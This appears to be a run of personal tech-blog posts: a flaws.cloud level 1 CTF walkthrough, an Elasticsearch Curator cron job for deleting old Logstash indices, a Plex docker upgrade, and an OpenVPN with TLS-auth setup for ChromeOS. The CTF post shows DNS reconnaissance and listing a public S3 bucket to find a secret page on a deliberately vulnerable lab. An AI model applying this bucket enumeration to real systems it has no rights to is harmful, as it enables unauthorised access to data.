If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

The emphasized word buckets must refer to S3 buckets. And given that S3 buckets are able to host static websites on them – it’s likely that flaw.cloud is hosted on s3.

Lets get the IP address (A Record) of flaws.cloud

  nslookup flaws.cloud

  > flaws.cloud
  Server:         8.8.8.8
  Address:        8.8.8.8#53

  Non-authoritative answer:
  Name:   flaws.cloud
  Address: 54.231.184.251

Now, lets do an reverse look-up on 54.231.184.251

  > 54.231.184.251
  Server:         8.8.8.8
  Address:        8.8.8.8#53

  Non-authoritative answer:
  251.184.231.54.in-addr.arpa     name = s3-website-us-west-2.amazonaws.com.

Ok – confirmed. It’s an s3 static website in the us-west-2 region.

If you using a custom domain (e.g. flaws.cloud) for you S3 hosted static site, then the bucket name must match the domain name.

This tells us the bucket name is flaws.cloud

The URL format for S3 HTTP end points are as follows: s3-<region>.amazonaws.com/<bucketname>

So given the information we have, we can tell that the s3 end point for this bucket is: http://s3-us-west-2.amazonaws.com/flaws.cloud

Browse there, and you’ll get an XML response referencing the following files within the bucket:

  • hint1.html
  • hint2.html
  • hint3.html
  • index.html
  • robots.txt
  • secret-dd02c7c.html

Obviously secret-dd02c7c.html looks juicy, lets browse there: http://s3-us-west-2.amazonaws.com/flaws.cloud/secret-dd02c7c.html

Level 2 unlocked.

ELK – Auto-delete older Logstash indices

The following is an approach to auto-delete Logstash indices in Elasticsearch every X days. The following steps are to be run on your ELK host.

Get curator-cli

sudo pip install elasticsearch-curator -U

Create script

cd ~/
vim elasticsearch_del.sh

My preference is to delete indices older than 30 days, change the 30 to your preference. Then save the file.

#!/bin/bash                                                                                                                                           
/usr/local/bin/curator_cli "$@" delete_indices --filter_list '[{"filtertype":"age","source":"creation_date","direction":"older","unit":"days","unit_count":30},{"filtertype":"pattern","kind":"prefix","value":"logstash"}]'

Now make the script executable:
chmod +x elasticsearch_del.sh

Then run the script to make sure it works – use the --dry-run argument to test (i.e. not actually take any action):

./elasticsearch_del.sh --dry-run

If you you’re happy with the output and want to run it for real:

./elasticsearch_del.sh

Setup a CRON schedule job

crontab -e

Add the following line – changing the schedule to your preference. This runs it every Saturday at 5pm:

0 17 * * SAT /home/db/elasticsearch_del.sh

timhaak/plex docker upgrade

I’m using the timhaak/plex docker image

Here is to upgrade:

sudo docker pull timhaak/plex

sudo docker rm plex

Get it running again:
sudo docker run -d --restart=always -e PLEX_ALLOWED_NETWORKS=<CIDR> --name <shortname> -h <hostname> -v <config-location>:/config -v <media-location>:/data/movies -p 32400:32400 -p 32400:32400/udp -p 32469:32469 -p 32469:3
2469/udp -p 1900:1900/udp -p 32410:32410/udp -p 32412:32412/udp -p 32413:32413/udp -p 32414:32414/udp timhaak/plex

Replace:

<shortname> with what you want the container to be called

<hostname> with what you want the PMS to be called

<config-location> with the location of your Plex config (note to self, mine is: /opt/plex-data/)

<media-location> with the location of your videos/media

Verify upgrade

Show running containers:

sudo docker ps

Take note of the container ID for plex

Get a bash shell to the running Plex container:

sudo docker exec -it <containerid> /bin/bash

Verify the version installed

dpkg-query -s plexmediaserver | grep "Version"

ChromeOS + OpenVPN (+ TLSAuth)

This is a guide to get OpenVPN (with TLS Auth) working for a ChromeOS client. Note this guide assumes you to have control of the OpenVPN server and associated configuration. This guide doesn’t explain the specifics of port forwarding on your router, or use of Dynamic DNS – if you’re doing all the below I’ll assume you know about doing those things – if not there are plenty of tutorials around.

Versions used:

  • ChromeOS 57.0.2987.115 beta – on Samsung Chromebook Plus
  • Ubuntu 14.04 LTS (Bit old I know, but systemd 😦 )
  • OpenVPN 2.3.2 (openvpn 2.3.2-7ubuntu3.1)

Install OpenVPN server and easy-rsa

sudo apt-get install openvpn easy-rsa
sudo mkdir /etc/openvpn/easy-rsa/
sudo cp -r /usr/share/easy-rsa/* /etc/openvpn/easy-rsa/

Create certificates

cd /etc/openvpn/easy-rsa

Edit vars file to update the values

  • Set KEY_SIZE to 2048
  • Also set KEY_COUNTRY, KEY_PROVINCE, KEY_CITY, KEY_ORG, KEY_EMAIL parameters. Don’t leave any of these parameters blank.

Run ./vars to load parameters
Run ./clean-all to clear keys and previous files

Now lets create our CA cert and key:

Run ./build-ca. The majority of the defaults will be loaded of the var specified values, but you must enter the Common Name (CN) – enter a name that identifies your CA. MyVPN-CA for example. This will create two files 1) ca.crt your CA cert (public) and 2) ca.key you CA private key (secret!)

Now to create the server cert and key:

Run ./build-key-server server. Like the previous command most values can be defaulted. When prompted for CN, enter server. Then select yes for both Sign Certificate and Commit. This will create two files 1) server.crt your servers cert (public) and 2) server.key your servers private key (secret!)

Time for the client(s) cert and key(s):

Run ./build-key-client client1. When prompted for CN, enter a name unique for each client – e.g. client1. Then select yes for both Sign Certificate and Commit. This will create two files 1) client1.crt your clients cert (public) and 2) client1.key your clients private key (secret!)

Now we need to put the client cert and key into a format understood by ChromeOS, namely pkcs12. Run openssl pkcs12 -export -in client1.crt -inkey client1.key -certfile ca.crt -name MyClient -out client1.p12. Enter an export passphrase. This will create a file called client1.p12.

You can repeat the above each client, and just increment the client number: client2, client3 etc…

Now to generate the Diffie Hellman parameters. Run ./build-dh – this may take a few to many minutes. This will create a file called dh2048.pem – this is not secret.

Finally, we should create an OpenVPN static key. Run openvpn --genkey --secret ./keys/ta.key. This will create a file called ta.key – this is another secret. Now we need this is a strange and specific format for ChromeOS where it’s all in one line with inline line break escape characters ‘\n’. So lets do that with a bit of Perl – grep -v '#' ./keys/ta.key | perl -p -e 's/\n/\\n/' > ./keys/ta-oneliner.key.

Now we need to copy the files required by the server into the appropriate directory for your OpenVPN server, like this: cp ./keys/ca.rt ./keys/server.crt ./keys/server.key ./keys/ta.key ./keys/dh2048.pem /etc/openvpn/

While we are here, there are a number of files that you need to get to your client (e.g ChromeOS). There many ways to do this – for example copy somewhere using scp then copying into Google Drive. The files your client needs are client1.p12, ca.crt and ta-oneliner.key.

Configure server

sudo nano /etc/openvpn/server.conf

Here is the content of mine with comments for each line – known to work with ChromeOS clients (see version above)


port 443 #Listen on port 443 – change if you like
proto tcp #Use TCP – change to UDP if you prefer
dev tun #Use tun interface – this is recommeded for most use cases
ca ca.crt #Read CA cert/pub key from ca.crt (not-secret)
cert server.crt #Read server cert/pub key from server.crt (not-secret)
key server.key #Read server private key from server.key (SECRET!)
dh dh2048.pem #Read Diffie Hellan (DH) parms from db2048.pem
server 10.8.0.0 255.255.255.248 #IP range for clients – change if you like
push "topology subnet" #Recommended topology
ifconfig-pool-persist ipp.txt #Will try give the same ip to clients every connection
push "redirect-gateway def1" #Override default gateway of client on client
push "dhcp-option DNS 8.8.8.8" #Primary DNS server for clients
push "dhcp-option DNS 8.8.4.4" #Secondary DNS server for clients
keepalive 10 120 #Keep alive params
tls-auth ta.key 0 #Enable additional HMAC auth, reads OpenVPN static key from ta.key
comp-lzo #Enable fast LZO compression
user nobody #Set unpriv'd user
group nogroup #Set unpriv'd group
persist-key # Don't re-read key files on ping restart / SIGUSR1
persist-tun # Don't close/reopen tun inteface on ping restart / SIGUSR1
status openvpn-status.log #Write operational status to this file
verb 3 #Enable level 3 debugging verbosity
plugin /usr/lib/openvpn/openvpn-plugin-auth-pam.so login #ChromeOS wants username and password so MAY need this – I'm not convinced

Enable IPv4 forwarding:

Edit /etc/sysctl.confand uncomment net.ipv4.ip_forward=1 to enable IP forwarding. Then make it come into effect by running sudo sysctl -p /etc/sysctl.conf

Restart Openvpn server:

sudo service openvpn restart. And verify it’s actually running – sudo service openvpn status. If it’s not look in \var\log\syslog for any errors/hints.

Client Configuration (ChromeOS)

Open Chrome – and goto chrome://settings/certificates

Select ‘Authorities’, then ‘Import’, and load in the ca.crt file. When prompted tick the ‘Trust this certificate for identifying websites.’ You should see your certificate in the list under the ‘Private’ parent.

In the same certificates window select the ‘Your Certificates’ tab – then ‘Import and Bind to device…’ and load in the client.p12 and enter the passphrase you specified when creating it. You should now see your client certificate listed.

Now we need to create a ONC file for ChromeOS:

  1. Generate two random GUIDs via https://www.uuidgenerator.net/ or similar. Refresh the page to get your second one. Take note of both, I will refer to them as GUID#1 and GUID#2
  2. Copy the following into a text editor on your ChromeBook


{
"Type":"UnencryptedConfiguration",
"Certificates": [ {
"GUID": "{<GUID#1>}",
"Type": "Authority",
"X509": "<CA_CERT>"
} ],
"NetworkConfigurations": [ {
"GUID": "{<GUID#2>}",
"Name": "<VPN_NAME>",
"Type": "VPN",
"VPN": {
"Type": "OpenVPN",
"Host": "<HOSTHAME>",
"OpenVPN": {
"ServerCARef": "{<GUID#1>}",
"AuthRetry": "interact",
"ClientCertType": "Pattern",
"ClientCertPattern": {
"IssuerCARef": [ "{<GUID#1>}" ]
},
"CompLZO": "true",
"Port": 443,
"Proto": "tcp",
"RemoteCertTLS":"server",
"RemoteCertEKU": "TLS Web Server Authentication",
"SaveCredentials": false,
"ServerPollTimeout": 10,
"Username": "<USERNAME>",
"KeyDirection":"1",
"TLSAuthContents":"<TLS_AUTH_KEY>"
}
}
} ]
}

3. Replace the following values in the above files:

  • <GUID#1> – paste value from earlier
  • <GUID#2> – paste value from earlier
  • <VPN_NAME>: Enter a name for your connection. This what you’ll see in the ChromeOS VPN UI.
  • <CA-CERT>: this is the contents of the CA.crt, without the header lines, on one long line, so it will be one long string of base64 encoded ascii, typically begining with “MII” and continuing on for some lines, remove the newlines in the cert. The footer line “—–END CERTIFICATE—–” is also not included.
  • <HOSTNAME>: This is simply the hostname of your VPN server. Do not include port – as this is specified by the ‘port’ parameter – change that if you’re not using 443.
  • <USERNAME>: Is your username on the vpn server.
  • <TLS_AUTH_KEY>: This one is the TLS auth key. Open ta-oneliner.key and paste the contents.

Save your ONC file. Not it contains secret information to treat accordingly. Any filename will do, but maintain the .onc extension

Now we need to install the ONC file:

  • In Chrome goto chrome://net-internals#chromeos
  • Click ‘Choose File’ under ‘Import ONC file’
  • Set your ONC file. Note you may get no postive or negative response from the import attempt. Just go to the VPN UI in the ChromeOS launcher – if the import succeeded you’ll see your VPN connection listed.
Test!

Drop comments/queries below and I’ll assist if I can.

Source and extra reading